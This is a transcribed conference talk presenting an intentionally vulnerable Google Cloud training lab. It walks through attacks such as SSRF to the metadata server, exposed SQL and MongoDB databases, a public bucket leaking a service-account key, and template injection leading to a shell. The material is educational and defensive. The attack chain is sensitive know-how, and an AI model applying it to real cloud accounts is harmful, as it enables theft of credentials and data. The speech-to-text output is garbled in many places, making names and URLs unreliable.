 So, hello everyone, today I am going to speak about understanding the common cloud misconfiguration using the GCP code. Before going into the me, the small data introduction about me, I worked as a security researcher at the company called V45. My primary area of interest is around like a cloud security, DevSecOps and like a Kubernetes security. I regularly share my learnings via blogs or at project, at my website like www.jojsoythebre.com. So this is my Twitter and feel free to follow me or reach out to me in order if you want to discuss anything about the security or just have a casual chat. So the audience of the talk is like a red team who wants to understand the cloud security and the blue teamer who wants to know how to secure their environment in the GCP environment and anyone interested in the cloud security in specially GCP. Hey Josh, do you mind clicking present at the top right? What? On your slide share, do you mind clicking present at your top right? Yes. Can't you see my screen? Yeah, we can. But go to your slide, Google slides. I'll be just explaining this one. This is good, right? Yeah, but make sure you go into slide share mode. It's present. Click on present at the top right in Google slides, okay? No, I have to switch back between like other things. Okay. Okay. Hide on the little notification where to stop sharing next to it. Yeah, sure. Thank you. Thank you. Thank you. Thank you. So the take care of the talk is like you by end of the talk you will be able to understand the common cloud rooms configuration in the Google cloud services. So before going to the actual slides and other things I just want to expect why I have created this GCP code in the first place. So when I started to learn the GCP security back like years ago, there is no rule in order to for me to learn the GCP security. There are other tools like other tools like other tools for other cloud products like AWS for AWS that is like AWS code and for the tools that Kubernetes we have like a Kubernetes code and for Terraform we have like a Terraform code. But there is no tool in order for me to learn the GCP, GCP security. The one way in the back desk for me to learn is the reading the documentation. So being the person who has to read the documentation, I just started to create the tool. So the complete project can be found in this URL, gcpcode.bcpcode.gov, so if you access this URL, you will be able to completely access this project and also this project is under like a free open source license like you could see the codes and able to make the changes and like add anything pick anything and also the most resources it will the most environment that we are creating what's under the free tier. So in order to start in order to deploy the GCP code, we have to like a working Google account with the billing enabled. If you don't have the Google cloud account like you can sign up for the free tier which you get like 300 orders and like 90 days, 3 months free tier so we can make use of this one. So in order to start the project, you have to create a new project, you just have to the Google cloud console and select the project and create the new project and you have to enter the valid name of the project, it can be any random name or any project any name you want to give and once you have created, you have to go to the APA dashboard by following if you click the link it will take you to the APA dashboard, you have to click on this enable service, so in this enable service we want to enable like a three services, one is like a Kubernetes engine, compute engine APA and the second one is the Kubernetes engine APA and third one is the cloud SQL admin APA, the reason why we are enabling the APA was like whenever we want to access the services program we have to enable the APA, once you have enabled the APA you have to click the terminal icon so once you have clicked the terminal icon you will get the gcloud shell, so the gcloud shell is like nothing but a VM so whenever we are creating the project we will get the gcloud shell, so the gcloud from the gcloud shell it has we can interact with the other Google, you can interact with the project and the other services inside the Google, so before like cloning this repo make sure you are currently under this project, the project that you have created because like you don't, since the application contains the vulnerable vulnerable codes and some other things, we want to make so like you are not deploying in the production environment or any other projects, so and also by the end of this, by the end of after the performance, after learning the things we are going to do in the project so it is at best to create a new project instead of using the existing project, in the first step we are going to go is like cloning the repo, let's see what the repo actually consists of, so if you could see like there are three folders currently present there, so in the first two folder, folder is called infra, so in the infra we will have like all the code that is all the application that is deployed in the GCP code, in the second folder is MD docs, so the MD docs is like where the documentation is actually resides, like if you could see that this MD docs is actually reside inside this folder and the third folder is like a scenario, so in this folder only we are creating the script necessary in order to create the scenarios will be in this folder, so once you have cloned the repo you have to, so it's looked like this one, you have to clone this one in the big cloud shell currently I am showing in my local environment, we have to go into the scenarios folder and here you could see like there are like around six scenarios present there, let's see scenarios one by one, so we are going to see the first scenario, so in order to start the in order to start before going to the how attacking the compute engine, I just want to explain the what is compute engine, so the compute engine is the service offered by Google Cloud in order to create and run the VMs, so if you are coming from the AWS background you would think like it is similar to EC2 instances, so let's see what the script consists of, so every scenario has something like create scenario and create scenario, let's see what is consist, what we are doing, in the first step we are getting the project ID that we are creating, so in the previous step like I have already mentioned we are creating the project and getting the project ID, in the second step we are assigning the current cloud shell to the project that we have created, so make sure all the resources that we are creating is deployed in the current project, in the next step we are creating the compute instance, so we are creating the compute VM called named test and the size of f1 micro and in the zone Asia East, so I have chosen this zone like because like it is very nearer to me because I currently live in India, you could also make changes to the zones here and the base image that I am using is cost table, so the cost table is stands for like container optimized OS so I have chosen this one because like I am I am deploying my application using the target container, so in the next step what I am doing is I am, so in this step you could see something like metadata from file, so what we are doing is like we are executing the some script whenever they are creating the VM or restarting the VM, so I will show the script after f1 all the steps, in the next step what we are doing is like creating the firewall tools, so whenever we are running the services inside the VM or any compute services inside the GCP it is by default it is following the deny principle, what I mean is like if you are running some engine inside the compute engine it cannot be accessed outside the world, in order to access the service outside the world you have to make sure to create the firewall rules, so I am just creating the firewall rules and make sure the 80 bot is open, in the last step we are getting the IP access of the compute VM that you have created and echoing like this application can be accessed by this IP, so I will just show what the script consists of, so in this step I am just running the target container, so I am creating one variable application and executing the hacker application, so if you could see like it is like from this diagram you could see it looks like this application, you could see like it is like an internal down detector, so you probably heard of down detector in order to detect like check the status of various web application, web application and there is also like internal down detector where the company are internal using to detect whether all the services are running correctly and smoothly, unfortunately this tool has to be done to be accessed only by internal access, but it is it is exposed to the external world, from this application you could see there is a URL on the header, if you are familiar with web application security you may chances of you may you may you may probably find out like what the one of these in this application, so if you know I will just tell like it is suffering from SSRF, so SSRF stands for server side request forgery, so it is basically nothing but we are clicking the server to the server to make request to like a another domain, I will just show one picture and I will explain, so this is how the SSRF will take place, so as the user you are making one request to the computing on the server, from the server we are making the request to other server, so the problem with this one is like every compute instance that we are creating will access to the metadata server, so the metadata server is the place where they have like the they store about the all the metadata, all the metadata of the instance that they are creating like when it is created, what are the images that we are using, what is the project that we are using, it may also contains the sensitive information, so this is the place where the metadata is reside inside the in the Google Cloud, so that in order to access the metadata server there are like two conditions that are to be made, the one first condition is like you have to make the request from the from the VM, like you cannot make from the local machine to the metadata server and the second thing is like you have to pass this data, so in the previous version of the Google Cloud compute instance, this one is not necessary but in the recent version they have made this data as necessary, once you have like entered these two fields in this one and when you click check status you will get like a sensitive information about all these things, I didn't show like output of this one because like it contains the sensitive information, so this is how we will exploit the compute engine, so once we have executed the script, the folder also contains the delete scenario, so let's see what the delete scenario consist of, so in the delete scenario we are getting again getting the project ID and configuring in the current shell to access the project and we are deleting the VM that I created and deleting the firewall rules, I just wanted to like once you have done with the scenario, it is advice to delete the scenario because like chances of like some like malicious people which attack the attack and create damage to your account, the next scenario that we are going to see is like SQL instance, attacking SQL instance, so the SQL instance is the service offered by Google to manage the database, so the main reason people are opting to cloud because like most of the databases are offered by as the service, so you don't need to like don't need to worry about the underlying infrastructure and all other stuffs like whether the OS is updated, whether the software SQL instance is updated or like that you have to, you don't have to worry, so let's see what the script consist of, in order to start the scenario you have to go into the scenario two folder and see what the create scenario consist of, in the first step as usual like we are getting the project ID that we have created and configuring the current shell to use the project ID, so this script expects like we have to pass some parameter after this one, so if you could see like you have to pass something like a SQL instance name, it could be any random name, so the only condition it has to be minimum like a six letter in characters, so in this step we are seeing whether we are passing any parameter or not and if it is not passing we are just telling like please pass the parameter and the next step we are creating the SQL instance of the name that you have passed and we are switching the database version like mysql 5.7 and we are using the tire f1 micro because like I have chosen this this version because like it is like the smallest tire and work on free tire and in this one we are I am switching the authorised network, so the basically the authorised network is something similar to the firewall by default the SQL database is not accessed by the other services in the other account, in order to access the database we have to create something like authorised network but the problem you could see like I am putting like 0.0.0.0, so what exactly do is like it is putting the database worldwide open, so this is in the last step we are getting the IP of the SQL instance and see whether and we are getting the IP address, so in the next step what I am doing is like I am using the nmap scan, so in the nmap scan we could see the recent like in the port 3306 the mysql server is running, so I am trying to in the next step what I am trying to do is like I am trying to access the mysql server, so in the mysql server I am just I am passing the user as root and the host as like the IP that I have got it, so in the next step we could see like I have get the shell inside the mysql, as the now as the mysql server I could see like it may contain the sensitive information or or I can do like mysql thing like deleting the tables or changing the values inside the table, yeah, so this is how we perform the attack in the SQL instance, what I want to say is like even though it is like a managed service there are certain features there are certain security things need to be taken care in order to secure the deployment, so once we are done with the scenario next we are just dating the scenario, so in the dating scenario we are getting the project area and configuring the current project ID, I am getting the shell and I am deleting the SQL instance, so this is how we will attack the SQL instance managed service SQL instance, in the next scenario what I am going to do is like I am going to attacking the I am going to tell like how we can attack the Kubernetes engine, so before going to the actual scenario I just want to explain about the Kubernetes in general, I cannot explain like a Kubernetes in like within like two or three minutes I just try to explain like a short introduction one on one in like a one minute one minutes, so before going to actually the Kubernetes we want to we want to understand like what the problem really Kubernetes are, so let's take the example we are you are running the simple verb application using the Docker container in the compute instance, due to some like viral view or something your website got huge traffic and like people are like one like two like people are start attack like using your websites, so due to IEAB traffic you cannot like access the the you could see like there is the website got very slow and people cannot start using accessing, so what you are trying to do is like you are trying to deploy the instead of one container you are trying to deploy like a four containers, so in order to in order to like make sure there is no single point of error you are deploying to container in the different VM instance and the different region, so may so the people can access easily but the problem with this one is like you have to make sure like all the containers are in sync to each other and all the container are very run in sync using doing this task manually is very difficult and not efficient and not disciplined in like a in in large product, so we have to use something like a orchestrator this is where like a Kubernetes came into picture, so the Kubernetes is the orchestrator you have for running the containers, so in Kubernetes this is the this is how the Kubernetes architecture look like it has like a two component one is like a control plane and the next one is like a worker mode in the control plane it is like that is one APA server, so the APA server is through which we can talk to the Kubernetes engine and the next one is the scheduler the scheduler will take care of deploying the application deploying the application in the it will decide like in which node the application has to be deployed and the HED is something like you could think like a brain of the Kubernetes it will ask it is it is simply a database which has the information about all the all the Kubernetes development and the third one is and this one is like a control manager, so the control manager the duty of the control manager is to make sure like all the all the application are in running state and this one is like an optional one it is like it is called cloud control manager, so the cloud when control manager what it does is like it acts like a bridge between the cloud and the Kubernetes deployment it will make sure like all the all the NF necessary are like created and the second main thing is like node so the node is where the actual application is deployed node there are two components the first one is like a Kubernetes proxy the Kubernetes proxy makes sure it helps to communicate between the between like all the parts and the Puglet it will talk to AP engine okay so so this is the basic introduction about the Kubernetes architecture so let's see what the script consists of now to start the scenario we have to move into the scenario defolder and let's see what the create scenario consists of so first we are getting the project ID as the every scenario and assigning the current cell to the project ID and next we are creating the clusters so we are creating the cluster with the base image over to image and in the zone how this ratio in order to access the application we have to we have to have some credentials so we are getting the credentials from this one and we are we are creating the firewall rules in order to access the services inside the Kubernetes engine in the last step we are using the kubectl tool to deploy the application inside the Kubernetes Kubernetes application so let's see what the mango mango construct so in the first step we are deploying the we are deploying the mango database so we are deploying the mango database using something called deployment so you could deploy you could think deployment is like abstraction over the application I don't want I don't want to go deep into this one explaining this one we can check out like a Kubernetes official documentation in order if you want to understand more about like a deployment and what all the things for now you could think like deployment as application so by default whenever we are deploying the application in the Kubernetes it cannot like talk to each other application so in order to talk to other applications and outside the world we are creating something called services you could think like service as something the way the application talks to other thing so there are like three ways that we can three common ways that we can expose the application to the outside world the first one is like a load balancer and the second one is the interest and third one is the node port so we are here we are using the type node port so the node port is nothing but like we are using the worker node and worker nodes I worker nodes to work on IP to expose the service that we are deploying in this in this scenario like we are using the three zero three zero three port so that's why we have created the firewall rules once you have deployed the scenario you have to execute this command so basically this command will show like what is what are all the what are all the nodes that are created so one when we are hitting this node you could see like hey it's showing that is MongoDB is running over there or you could like similar to the previous scenario you could also do like a nmap scan and you could see like the MongoDB is like running there once you have like that you could use like a Mongo client instance and try to access this one so instead of IP we have to pass the IP address that you have got from this step from from here you could see like we are getting the shell inside the database from this one we can see like all other informations from this database so this is how we can attack in the gk so if you are interested more in the Kubernetes I highly recommend you to check out the Kubernetes code by mazocola so the next thing I do that I'm going to explain is like attacking the cloud cloud cloud storage so the cloud storage cloud storage is as like other clouds the common in a the common attack surface for the Google cloud environment is the cloud storage you could see like the as probably many of you know like the common attack scenario is like exposing the sensitive information in say in the Google in the bucket and attack and try to get the access of the attack and try to get the access of the bucket and get see the see the sensitive information let's see what the scenario what the scenario consists of in order to stop the scenario or to go to the scenario four folder and see create bucket so first what we are doing is like we are getting the project ID and we are selecting the current send to the project ID so next to what we are doing is like for this scenario you have to pass some parameter to the shell okay to the script so we are getting the project ID and we are we are like creating the one bucket so to create in order to create the bucket I have used the tool called GSP so GSP is the tool in order to interact with the other in order to interact with the Google cloud bucket so in the next step in the next so the one thing that you want to keep in mind is like whenever we are creating the bucket their bucket name has to be in it like for across the Google cloud for example there are two buckets there are two buckets there are two uh there are let's say there are two companies company A and company B and company A is used to the bucket called test the company B cannot use the bucket even though it has like a even though they are using the different environment they cannot use the same bucket bucket name so in the next step we are creating something called service account I will explain more about service account in the later later later scenarios for now you would think like a service account is something like something like uh something like a something like a other account in so we are we are to this account we are assigning the storage admin permission so the storage admin permission is like the permission where he can the user can read the list the bucket read the bucket and read the content the bucket and read the content in the bucket and change the content the bucket in the next step so whenever we are creating the service account we cannot directly use the service account in order to use the service account we are creating the service key and the next step we are just copying the service key to project to the project to the bucket that we have created in the last part we are doing is like we are changing the permission of the bucket to worldwide readable so what we are doing is like after this one we are getting the bucket URL so once you have access to this bucket URL you could see like there is something called service you could see you could see something like this one so there is something called service key dot json so service key dot json so when we are using W gate to see what are the contents are present inside the service key so you would see like we are using we are seeing the service account so this is how we can perform the attack on the attack the perform on the google cloud bucket so we have to we have to please make sure like after this scenario after doing this one you have to dating the accounts dating the scenario so in the next scenario we are going to see how we can use the do the privilege escalation using the service account so the one thing that we want to make sure like before going to the scenario you have to create we have to done with the scenario and like do this do this scenario because like this scenario is based on the previous scenario so I just go into the scenario five-folder let's see what is consistent so in this scenario I am just getting the project ID and assigning the current cell to the project ID and after that I am get after that I am just downloading the Docker image and tagging the Docker image to the project ID so I can pull it push it to the Docker registry and remove the Docker image so Joshua you have five minutes oh yeah sure so so you could see like from the previous scenario we have gotten the service account right so from the service account we are we have to execute this we have to execute these steps so basically in this step what I'm trying to do is like I'm trying to switch to that account instead of using the my water my the current account so if you remember like we have used the storage admin permission so by default whenever we are using the google container registry all the container images that we are using will be will be used will be using the google bucket by default since we have permission to use the see the bucket we are trying to see what are the image that are present there you could see like there is image called secret so in the next step what we are trying to do is like we are trying to download the image that are present and in the next step we are getting this shell inside the container download container you could see like there is secret file is present you could see if you perform like a cat on the secret folder you could see like there is super security sprang so so in the real-world scenario you could like see it may contain the sensitive information like AWS keys and others APAs and all so once we have done with the scenario you have make sure like you are switching back to the original account and performing the delete account so the last the last scenario the last scenario that we are going to see is like a privilege escalation in the compute engine I quickly explain what the scenario is and just moving to the previous folder so I am just creating the one simple instance of the Ubuntu OS base and just creating the firewall rules to make sure that it is accessed by the user and just getting the IP address and the last step we are getting the creating the simple bucket called credit card okay once you have done with the creating we have to make sure like we have to access into the instance I have all had a step like how we can SSH like if you click this SSH but it will be getting the same inside the VM next you have to access next you have to access this so basically what this script is does is like it will download the python python application and start the python server once you have with the IP address you will get like a 401 404 404 but if you try to access this you are instead of IP address you are passing like something the IP address that you have got from the previous from the script output you will see like it will show like if you pass the joshua in the name parameter it will show allow joshua if you try to with the different parameter for example gcp code it will show like a gcp code so if you are familiar with the web application attack surface you could probably guess like it's suffering from template injection so the template injection is the security flaw where the template engine was deployed very fluently in flower way which will which remove which needs to the remote code execution in order to exploit the scenario we I am going to use the tool called tpl map it's similar to SQL map the only disadvantage of the tool is like it's still using it's deprecated and the tool using python tool so you have to pass this one this this common instead of IP address you have to pass the IP address that you have got from the script so you will get you will get the verification confirmation like you are it is suffering from template injection in the next step and we are getting the shell inside the container now we if you perform the gsqls you could see all the all the bucket percent inside the container the reason why we are seeing is like whenever we are creating the creating the compute engine it has like a default service account which doesn't follow the least privileged principle so once you have like done with the all the scenario I I recommend you to delete the project to make sure like there is no resources to end up so this is how we can contribute to the project like you can improve the documentation and add more scenarios to the code and improve the application used in the scenario and split spread the whole with the community so these are the my handles that you can reach out to me and I I want to thank you to all DEF CON crew for this opportunity and creating the awesome DEF CON Provisional Plage Virtual and I also want to take special thanks to Magno for helping me with the world project and the talk